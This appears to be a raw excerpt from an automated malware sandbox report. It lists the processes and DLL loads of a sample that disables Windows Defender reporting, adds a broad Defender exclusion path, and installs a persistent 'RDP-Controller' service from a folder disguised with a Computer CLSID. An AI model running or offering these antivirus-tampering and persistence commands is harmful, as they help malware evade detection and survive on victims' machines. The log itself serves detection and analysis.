Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5252 -s 1184
Source: unknown	Process created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 520 -p 5164 -ip 5164
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5164 -s 1112
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\frdnii7m0pblld98fxhpnx.bat"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exe "C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe "C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe	Process created: C:\Windows\System32\taskkill.exe taskkill.exe /F /FI "SERVICES eq RDP-Controller"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe	Process created: C:\Windows\System32\sc.exe sc.exe stop RDP-Controller	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe	Process created: C:\Windows\System32\sc.exe sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe	Process created: C:\Windows\System32\sc.exe sc.exe failure RDP-Controller reset= 1 actions= restart/10000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe	Process created: C:\Windows\System32\sc.exe sc.exe start RDP-Controller	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe	Process created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe	Process created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\95cRhCj4pPDP.acl	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 452 -p 5252 -ip 5252
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5252 -s 1184
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 520 -p 5164 -ip 5164
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5164 -s 1112
Source: C:\Windows\System32\WerFault.exe	Process created: unknown unknown
Source: C:\Windows\System32\WerFault.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: apphelp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: cryptbase.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: ntmarta.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: iphlpapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: winhttp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: windows.storage.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: wldp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: netapi32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: userenv.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: netutils.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: samcli.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: libi2p.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: cryptsp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: rsaenh.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: zlib1.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: dnsapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: rasadhlp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\icacls.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\icacls.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: licensemanagersvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: licensemanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: clipc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wersvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windowsperformancerecordercontrol.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: weretw.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: faultrep.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dbgcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: iphlpapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: winhttp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: cryptbase.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: windows.storage.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: wldp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: netapi32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: userenv.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: netutils.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: samcli.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: libi2p.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: wsock32.dll
